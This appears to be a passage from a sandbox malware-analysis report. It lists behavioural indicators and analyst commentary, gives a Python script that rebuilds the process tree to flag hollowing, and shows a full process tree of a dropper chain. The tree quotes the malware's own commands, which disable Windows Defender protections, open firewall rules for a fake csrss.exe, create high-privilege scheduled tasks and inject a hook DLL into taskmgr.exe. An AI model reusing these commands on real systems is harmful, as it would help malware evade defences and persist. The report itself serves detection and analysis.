  - 5208 WMIC.exe, second round (14): SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege
  The WMIC.exe block is the normal "enable every privilege in the token" behaviour of wmic.exe itself and is not suspicious on its own; the SeDebugPrivilege enables on the many powershell.exe instances and on installutil.exe are the ones that line up with the cross-process writes below.
- Suspicious use of FindShellTrayWindow (14 IoCs)
  - 4600 u2gc.1.exe (x7)
  - 5668 u1wo.1.exe (x7)

- Suspicious use of SendNotifyMessage (14 IoCs)
  - 4600 u2gc.1.exe (x7)
  - 5668 u1wo.1.exe (x7)
- Suspicious use of WriteProcessMemory (64 IoCs, grouped by writer/target pair with repeat counts; procid_target in parentheses)
  - 3772 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe wrote to 428 (83) x3
  - 428 explorku.exe wrote to 4888 (84) x12
  - 428 explorku.exe wrote to 696 (85) x3
  - 696 amers.exe wrote to 3856 (86) x3
  - 428 explorku.exe wrote to 3668 (87) x3
  - 3856 axplons.exe wrote to 4644 (88) x2
  - 4644 file300un.exe wrote to 1332 (90) x2
  - 1332 cmd.exe wrote to 956 (91) x2
  - 3856 axplons.exe wrote to 1336 (93) x3
  - 1336 NewB.exe wrote to 1792 (94) x3
  - 1336 NewB.exe wrote to 3180 (96) x3
  - 3180 ISetup8.exe wrote to 2808 (100) x3
  - 3180 ISetup8.exe wrote to 4600 (103) x3
  - 956 powershell.exe wrote to 5008 (108) x3
  - 956 powershell.exe wrote to 2096 (109) x8
  - 956 powershell.exe wrote to 2816 (110) x3
  - 2096 installutil.exe wrote to 2472 (113) x3
  - 2096 installutil.exe wrote to 916 (114) x2
  Two or three writes into a freshly created child are what CreateProcess plus the loader normally produce; the twelve writes from explorku.exe into 4888 and the eight from powershell.exe into installutil.exe, each followed by SetThreadContext on the same target, are the pairs to treat as injection.
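The "PID X wrote to memory of Y X image target-id" rows above carry the full execution lineage, and combining them with the SetThreadContext rows separates ordinary process creation from injection. The Python below is an added example, not tooling from the sandbox: it parses a constructed subset of this report's rows (the same pids, images and target ids, in the report's own flattened format), rebuilds the parent/child tree, counts writes per edge, and flags an edge as likely hollowing when the parent both wrote into the child and then called SetThreadContext on it. Image names are only known for pids that appear as writers, because the rows name the writer, not the target; the example leaves the rest unlabelled rather than guessing.

```python
import re
from collections import defaultdict

# Constructed subset of the page's WriteProcessMemory rows, in the report's flattened format.
WRITE_RECORDS = """\
PID 3772 wrote to memory of 428 3772 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe 83
PID 3772 wrote to memory of 428 3772 2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe 83
PID 428 wrote to memory of 4888 428 explorku.exe 84
PID 428 wrote to memory of 4888 428 explorku.exe 84
PID 428 wrote to memory of 4888 428 explorku.exe 84
PID 428 wrote to memory of 696 428 explorku.exe 85
PID 696 wrote to memory of 3856 696 amers.exe 86
PID 428 wrote to memory of 3668 428 explorku.exe 87
PID 3856 wrote to memory of 4644 3856 axplons.exe 88
PID 4644 wrote to memory of 1332 4644 file300un.exe 90
PID 1332 wrote to memory of 956 1332 cmd.exe 91
PID 956 wrote to memory of 2096 956 powershell.exe 109
PID 2096 wrote to memory of 916 2096 installutil.exe 114
"""
# The two SetThreadContext rows from the same report.
CONTEXT_RECORDS = """\
PID 428 set thread context of 4888 428 explorku.exe 84
PID 956 set thread context of 2096 956 powershell.exe 109
"""

# The writer pid is repeated after the target pid, hence the \1 back-reference.
ROW_RE = {
    "write": re.compile(r"PID (\d+) wrote to memory of (\d+) \1 (\S+) (\d+)"),
    "ctx": re.compile(r"PID (\d+) set thread context of (\d+) \1 (\S+) (\d+)"),
}


def parse_rows(text, kind):
    """(source pid, target pid, source image) for every row of the given kind."""
    return [(int(m.group(1)), int(m.group(2)), m.group(3))
            for m in ROW_RE[kind].finditer(text)]


def build_tree(write_text, ctx_text):
    children = defaultdict(list)   # parent pid -> distinct child pids, first-seen order
    images = {}                    # pid -> image, known only for pids that appear as writers
    writes = defaultdict(int)      # (parent, child) -> number of WriteProcessMemory rows
    for src, dst, img in parse_rows(write_text, "write"):
        images[src] = img
        if dst not in children[src]:
            children[src].append(dst)
        writes[(src, dst)] += 1
    ctx_pairs = {(src, dst) for src, dst, _ in parse_rows(ctx_text, "ctx")}
    # Writing a payload into the child and then redirecting its thread context is
    # the hollowing / injection sequence; plain process creation has no ctx row.
    hollow = {pair for pair in ctx_pairs if writes.get(pair, 0) > 0}
    return dict(children), images, dict(writes), hollow


def roots(children):
    """Pids that write into others but are never written into: the tree roots."""
    all_children = {c for kids in children.values() for c in kids}
    return [p for p in children if p not in all_children]


def render(children, images, writes, hollow, pid, depth=0, parent=None):
    """Indented text tree; each child line carries its write count and injection flag."""
    note = ""
    if parent is not None:
        note = f"  [{writes[(parent, pid)]} writes"
        note += ", SetThreadContext: likely hollowing]" if (parent, pid) in hollow else "]"
    lines = [f"{'  ' * depth}{pid} {images.get(pid, '(image not in these rows)')}{note}"]
    for child in children.get(pid, []):
        lines.extend(render(children, images, writes, hollow, child, depth + 1, pid))
    return lines


if __name__ == "__main__":
    tree = build_tree(WRITE_RECORDS, CONTEXT_RECORDS)
    for root in roots(tree[0]):
        print("\n".join(render(*tree, root)))
```

Run against the full row set from this report, the same parser reproduces the process tree at the bottom of the page and, in addition, labels the explorku.exe (428) to 4888 and powershell.exe (956) to installutil.exe (2096) edges as injection, which the flat tree view does not show.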
Processes
1⤵ C:\Users\Admin\AppData\Local\Temp\2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe
   cmdline: "C:\Users\Admin\AppData\Local\Temp\2fbb454dfee76dd9c72e45e134acff79da30a6b007305c852b3d293c69af30d5.exe"
   PID: 3772
   - Identifies VirtualBox via ACPI registry values (likely anti-VM)
   - Checks BIOS information in registry
   - Identifies Wine through registry keys
   - Suspicious use of NtSetInformationThreadHideFromDebugger
   - Drops file in Windows directory
   - Suspicious behavior: EnumeratesProcesses
   - Suspicious use of WriteProcessMemory
  2⤵ C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
     cmdline: "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
     PID: 428
     - Identifies VirtualBox via ACPI registry values (likely anti-VM)
     - Checks BIOS information in registry
     - Executes dropped EXE
     - Identifies Wine through registry keys
     - Adds Run key to start application
     - Suspicious use of NtSetInformationThreadHideFromDebugger
     - Suspicious use of SetThreadContext
     - Suspicious behavior: EnumeratesProcesses
     - Suspicious use of WriteProcessMemory
    3⤵ C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
       cmdline: "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
       PID: 4888
       - Identifies VirtualBox via ACPI registry values (likely anti-VM)
       - Checks BIOS information in registry
       - Executes dropped EXE
       - Identifies Wine through registry keys
       - Suspicious use of NtSetInformationThreadHideFromDebugger
       - Suspicious behavior: EnumeratesProcesses
    3⤵ C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
       cmdline: "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
       PID: 696
       - Identifies VirtualBox via ACPI registry values (likely anti-VM)
       - Checks BIOS information in registry
       - Executes dropped EXE
       - Identifies Wine through registry keys
       - Suspicious use of NtSetInformationThreadHideFromDebugger
       - Drops file in Windows directory
       - Suspicious behavior: EnumeratesProcesses
       - Suspicious use of WriteProcessMemory
      4⤵ C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
         cmdline: "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
         PID: 3856
         - Identifies VirtualBox via ACPI registry values (likely anti-VM)
         - Checks BIOS information in registry
         - Executes dropped EXE
         - Identifies Wine through registry keys
         - Suspicious use of NtSetInformationThreadHideFromDebugger
         - Suspicious behavior: EnumeratesProcesses
         - Suspicious use of WriteProcessMemory
        5⤵ C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe
           cmdline: "C:\Users\Admin\AppData\Local\Temp\1000013001\file300un.exe"
           PID: 4644
           - Executes dropped EXE
           - Suspicious use of WriteProcessMemory
          6⤵ C:\Windows\system32\cmd.exe
             cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -EncodedCommand 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"
             PID: 1332
             - Suspicious use of WriteProcessMemory
            7⤵ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
               cmdline: powershell.exe -EncodedCommand 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
               PID: 956
               - Command and Scripting Interpreter: PowerShell
               - Suspicious use of SetThreadContext
               - Suspicious behavior: EnumeratesProcesses
               - Suspicious use of AdjustPrivilegeToken
               - Suspicious use of WriteProcessMemory
              8⤵ C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe
                 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe"
                 PID: 5008
              8⤵ C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
                 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"
                 PID: 2096
                 - Suspicious use of AdjustPrivilegeToken
                 - Suspicious use of WriteProcessMemory
                9⤵ C:\Users\Admin\Pictures\Hvoiy4AeWVSFQ1Iu3PervIKv.exe
                   cmdline: "C:\Users\Admin\Pictures\Hvoiy4AeWVSFQ1Iu3PervIKv.exe"
                   PID: 2472
                   - Executes dropped EXE
                  10⤵ C:\Users\Admin\AppData\Local\Temp\u1wo.0.exe
                     cmdline: "C:\Users\Admin\AppData\Local\Temp\u1wo.0.exe"
                     PID: 3628
                     - Blocklisted process makes network request
                     - Executes dropped EXE
                  10⤵ C:\Users\Admin\AppData\Local\Temp\u1wo.1.exe
                     cmdline: "C:\Users\Admin\AppData\Local\Temp\u1wo.1.exe"
                     PID: 5668
                     - Executes dropped EXE
                     - Checks SCSI registry key(s)
                     - Suspicious use of FindShellTrayWindow
                     - Suspicious use of SendNotifyMessage
                  10⤵ C:\Windows\SysWOW64\WerFault.exe
                     cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2472 -s 1548
                     PID: 5744
                     - Program crash
                9⤵ C:\Users\Admin\Pictures\KJrrevHavC5XbNvd93Zt87NV.exe
                   cmdline: "C:\Users\Admin\Pictures\KJrrevHavC5XbNvd93Zt87NV.exe"
                   PID: 916
                   - Executes dropped EXE
                   - Suspicious behavior: EnumeratesProcesses
                   - Suspicious use of AdjustPrivilegeToken
                  10⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                     cmdline: powershell -nologo -noprofile
                     PID: 4648
                     - Command and Scripting Interpreter: PowerShell
                     - Suspicious behavior: EnumeratesProcesses
                     - Suspicious use of AdjustPrivilegeToken
                  10⤵ C:\Users\Admin\Pictures\KJrrevHavC5XbNvd93Zt87NV.exe
                     cmdline: "C:\Users\Admin\Pictures\KJrrevHavC5XbNvd93Zt87NV.exe"
                     PID: 5480
                     - Executes dropped EXE
                     - Checks for VirtualBox DLLs, possible anti-VM trick
                    11⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                       cmdline: powershell -nologo -noprofile
                       PID: 3404
                       - Command and Scripting Interpreter: PowerShell
                       - Drops file in System32 directory
                       - Modifies data under HKEY_USERS
                       - Suspicious use of AdjustPrivilegeToken
                    11⤵ C:\Windows\system32\cmd.exe
                       cmdline: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                       PID: 5436
                      12⤵ C:\Windows\system32\netsh.exe
                         cmdline: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                         PID: 4648
                         - Modifies Windows Firewall
                    11⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                       cmdline: powershell -nologo -noprofile
                       PID: 6128
                       - Command and Scripting Interpreter: PowerShell
                       - Drops file in System32 directory
                       - Modifies data under HKEY_USERS
                       - Suspicious use of AdjustPrivilegeToken
                    11⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                       cmdline: powershell -nologo -noprofile
                       PID: 2192
                       - Command and Scripting Interpreter: PowerShell
                       - Modifies data under HKEY_USERS
                       - Suspicious use of AdjustPrivilegeToken
                    11⤵ C:\Windows\rss\csrss.exe
                       cmdline: C:\Windows\rss\csrss.exe
                       PID: 2112
                      12⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                         cmdline: powershell -nologo -noprofile
                         PID: 1248
                         - Command and Scripting Interpreter: PowerShell
                      12⤵ C:\Windows\SYSTEM32\schtasks.exe
                         cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                         PID: 3728
                         - Creates scheduled task(s)
                      12⤵ C:\Windows\SYSTEM32\schtasks.exe
                         cmdline: schtasks /delete /tn ScheduledUpdate /f
                         PID: 5552
                        13⤵ C:\Windows\System32\Conhost.exe
                           cmdline: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                           PID: 5088
                      12⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                         cmdline: powershell -nologo -noprofile
                         PID: 3912
                         - Command and Scripting Interpreter: PowerShell
                      12⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                         cmdline: powershell -nologo -noprofile
                         PID: 1972
                         - Command and Scripting Interpreter: PowerShell
                      12⤵ C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                         cmdline: C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                         PID: 5896
                      12⤵ C:\Windows\SYSTEM32\schtasks.exe
                         cmdline: schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                         PID: 4744
                         - Creates scheduled task(s)
                      12⤵ C:\Windows\windefender.exe
                         cmdline: "C:\Windows\windefender.exe"
                         PID: 3720
                        13⤵ C:\Windows\SysWOW64\cmd.exe
                           cmdline: cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                           PID: 4236
                          14⤵ C:\Windows\SysWOW64\sc.exe
                             cmdline: sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                             PID: 5504
                             - Launches sc.exe
                9⤵ C:\Users\Admin\Pictures\Zl7alJlvns99KqkrvTPtua9F.exe
                   cmdline: "C:\Users\Admin\Pictures\Zl7alJlvns99KqkrvTPtua9F.exe"
                   PID: 3004
                   - Executes dropped EXE
                   - Suspicious behavior: EnumeratesProcesses
                   - Suspicious use of AdjustPrivilegeToken
                  10⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                     cmdline: powershell -nologo -noprofile
                     PID: 5088
                     - Command and Scripting Interpreter: PowerShell
                     - Suspicious behavior: EnumeratesProcesses
                     - Suspicious use of AdjustPrivilegeToken
                  10⤵ C:\Users\Admin\Pictures\Zl7alJlvns99KqkrvTPtua9F.exe
                     cmdline: "C:\Users\Admin\Pictures\Zl7alJlvns99KqkrvTPtua9F.exe"
                     PID: 2268
                     - Executes dropped EXE
                     - Checks for VirtualBox DLLs, possible anti-VM trick
                    11⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                       cmdline: powershell -nologo -noprofile
                       PID: 5196
                       - Command and Scripting Interpreter: PowerShell
                       - Drops file in System32 directory
                       - Modifies data under HKEY_USERS
                       - Suspicious use of AdjustPrivilegeToken
                    11⤵ C:\Windows\system32\cmd.exe
                       cmdline: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                       PID: 3744
                      12⤵ C:\Windows\system32\netsh.exe
                         cmdline: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                         PID: 5712
                         - Modifies Windows Firewall
                    11⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                       cmdline: powershell -nologo -noprofile
                       PID: 1768
                       - Command and Scripting Interpreter: PowerShell
                       - Drops file in System32 directory
                       - Modifies data under HKEY_USERS
                       - Suspicious use of AdjustPrivilegeToken
                    11⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                       cmdline: powershell -nologo -noprofile
                       PID: 2436
                       - Command and Scripting Interpreter: PowerShell
                       - Modifies data under HKEY_USERS
                       - Suspicious use of AdjustPrivilegeToken
                9⤵ C:\Users\Admin\Pictures\sd9DA3ZWGLEoKHgSiqfkjIaO.exe
                   cmdline: "C:\Users\Admin\Pictures\sd9DA3ZWGLEoKHgSiqfkjIaO.exe"
                   PID: 4700
                   - Executes dropped EXE
                   - Suspicious use of AdjustPrivilegeToken
                  10⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                     cmdline: powershell -nologo -noprofile
                     PID: 3184
                     - Command and Scripting Interpreter: PowerShell
                     - Suspicious behavior: EnumeratesProcesses
                     - Suspicious use of AdjustPrivilegeToken
                  10⤵ C:\Users\Admin\Pictures\sd9DA3ZWGLEoKHgSiqfkjIaO.exe
                     cmdline: "C:\Users\Admin\Pictures\sd9DA3ZWGLEoKHgSiqfkjIaO.exe"
                     PID: 2392
                     - Executes dropped EXE
                     - Checks for VirtualBox DLLs, possible anti-VM trick
                     - Modifies data under HKEY_USERS
                    11⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                       cmdline: powershell -nologo -noprofile
                       PID: 5828
                       - Command and Scripting Interpreter: PowerShell
                       - Drops file in System32 directory
                       - Modifies data under HKEY_USERS
                       - Suspicious use of AdjustPrivilegeToken
                    11⤵ C:\Windows\system32\cmd.exe
                       cmdline: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                       PID: 1708
                      12⤵ C:\Windows\system32\netsh.exe
                         cmdline: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                         PID: 6072
                         - Modifies Windows Firewall
                    11⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                       cmdline: powershell -nologo -noprofile
                       PID: 3184
                       - Command and Scripting Interpreter: PowerShell
                       - Drops file in System32 directory
                       - Modifies data under HKEY_USERS
                       - Suspicious use of AdjustPrivilegeToken
                    11⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                       cmdline: powershell -nologo -noprofile
                       PID: 5536
                       - Command and Scripting Interpreter: PowerShell
                       - Modifies data under HKEY_USERS
                       - Suspicious use of AdjustPrivilegeToken
                9⤵ C:\Users\Admin\Pictures\sxH8wPyOdz7RaPkmDFy3Ezsl.exe
                   cmdline: "C:\Users\Admin\Pictures\sxH8wPyOdz7RaPkmDFy3Ezsl.exe"
                   PID: 5060
                   - Modifies firewall policy service
                   - Executes dropped EXE
                   - Drops file in System32 directory
                9⤵ C:\Users\Admin\Pictures\QB6YJisOeMAwgSEX9tGB7uFD.exe
                   cmdline: "C:\Users\Admin\Pictures\QB6YJisOeMAwgSEX9tGB7uFD.exe"
                   PID: 940
                   - Executes dropped EXE
                   - Suspicious behavior: EnumeratesProcesses
                   - Suspicious use of AdjustPrivilegeToken
                  10⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                     cmdline: powershell -nologo -noprofile
                     PID: 3800
                     - Command and Scripting Interpreter: PowerShell
                     - Suspicious behavior: EnumeratesProcesses
                     - Suspicious use of AdjustPrivilegeToken
                  10⤵ C:\Users\Admin\Pictures\QB6YJisOeMAwgSEX9tGB7uFD.exe
                     cmdline: "C:\Users\Admin\Pictures\QB6YJisOeMAwgSEX9tGB7uFD.exe"
                     PID: 5516
                     - Executes dropped EXE
                     - Checks for VirtualBox DLLs, possible anti-VM trick
                    11⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                       cmdline: powershell -nologo -noprofile
                       PID: 6120
                       - Command and Scripting Interpreter: PowerShell
                       - Drops file in System32 directory
                       - Modifies data under HKEY_USERS
                       - Suspicious use of AdjustPrivilegeToken
                    11⤵ C:\Windows\system32\cmd.exe
                       cmdline: C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                       PID: 5348
                      12⤵ C:\Windows\system32\netsh.exe
                         cmdline: netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                         PID: 5740
                         - Modifies Windows Firewall
                    11⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                       cmdline: powershell -nologo -noprofile
                       PID: 5812
                       - Command and Scripting Interpreter: PowerShell
                       - Drops file in System32 directory
                       - Modifies data under HKEY_USERS
                       - Suspicious use of AdjustPrivilegeToken
                    11⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                       cmdline: powershell -nologo -noprofile
                       PID: 1248
                       - Command and Scripting Interpreter: PowerShell
                       - Modifies data under HKEY_USERS
                       - Suspicious use of AdjustPrivilegeToken
                9⤵ C:\Users\Admin\Pictures\9jNfLlKCEF3ERyMnjj34oq77.exe
                   cmdline: "C:\Users\Admin\Pictures\9jNfLlKCEF3ERyMnjj34oq77.exe"
                   PID: 5948
                   - Executes dropped EXE
                  10⤵ C:\Users\Admin\AppData\Local\Temp\7zS8901.tmp\Install.exe
                     cmdline: .\Install.exe /tEdidDDf "385118" /S
                     PID: 812
                     - Checks BIOS information in registry
                     - Executes dropped EXE
                     - Enumerates system info in registry
                    11⤵ C:\Windows\SysWOW64\cmd.exe
                       cmdline: "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                       PID: 1108
                      12⤵ C:\Windows\SysWOW64\forfiles.exe
                         cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                         PID: 5984
                        13⤵ C:\Windows\SysWOW64\cmd.exe
                           cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                           PID: 5972
                          14⤵ \??\c:\windows\SysWOW64\reg.exe
                             cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                             PID: 1500
                      12⤵ C:\Windows\SysWOW64\forfiles.exe
                         cmdline: forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                         PID: 5332
                        13⤵ C:\Windows\SysWOW64\cmd.exe
                           cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                           PID: 4844
                          14⤵ \??\c:\windows\SysWOW64\reg.exe
                             cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                             PID: 3800
                      12⤵ C:\Windows\SysWOW64\forfiles.exe
                         cmdline: forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                         PID: 5428
                        13⤵ C:\Windows\SysWOW64\cmd.exe
                           cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                           PID: 5524
                          14⤵ \??\c:\windows\SysWOW64\reg.exe
                             cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                             PID: 3164
                      12⤵ C:\Windows\SysWOW64\forfiles.exe
                         cmdline: forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                         PID: 5228
                        13⤵ C:\Windows\SysWOW64\cmd.exe
                           cmdline: /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                           PID: 1992
                          14⤵ \??\c:\windows\SysWOW64\reg.exe
                             cmdline: reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                             PID: 4684
                      12⤵ C:\Windows\SysWOW64\forfiles.exe
                         cmdline: forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                         PID: 5864
                        13⤵ C:\Windows\SysWOW64\cmd.exe
                           cmdline: /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                           PID: 5932
                          14⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                             cmdline: powershell start-process -WindowStyle Hidden gpupdate.exe /force
                             PID: 4632
                             - Command and Scripting Interpreter: PowerShell
                             - Suspicious use of AdjustPrivilegeToken
                            15⤵ C:\Windows\SysWOW64\gpupdate.exe
                               cmdline: "C:\Windows\system32\gpupdate.exe" /force
                               PID: 3100
                    11⤵ C:\Windows\SysWOW64\forfiles.exe
                       cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"
                       PID: 5436
                      12⤵ C:\Windows\SysWOW64\cmd.exe
                         cmdline: /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                         PID: 4760
                        13⤵ C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                           cmdline: powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                           PID: 5088
                           - Command and Scripting Interpreter: PowerShell
                           - Suspicious use of AdjustPrivilegeToken
                          14⤵ C:\Windows\SysWOW64\Wbem\WMIC.exe
                             cmdline: "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True
                             PID: 5208
                             - Suspicious use of AdjustPrivilegeToken
                    11⤵ C:\Windows\SysWOW64\schtasks.exe
                       cmdline: schtasks /CREATE /TN "bbmnnUCIPYyTQrzMQJ" /SC once /ST 04:43:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zS8901.tmp\Install.exe\" it /WbvdidcnYg 385118 /S" /V1 /F
                       PID: 2548
                       - Drops file in Windows directory
                       - Creates scheduled task(s)
                    11⤵ C:\Windows\SysWOW64\forfiles.exe
                       cmdline: "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ"
                       PID: 944
                      12⤵ C:\Windows\SysWOW64\cmd.exe
                         cmdline: /C schtasks /run /I /tn bbmnnUCIPYyTQrzMQJ
                         PID: 1708
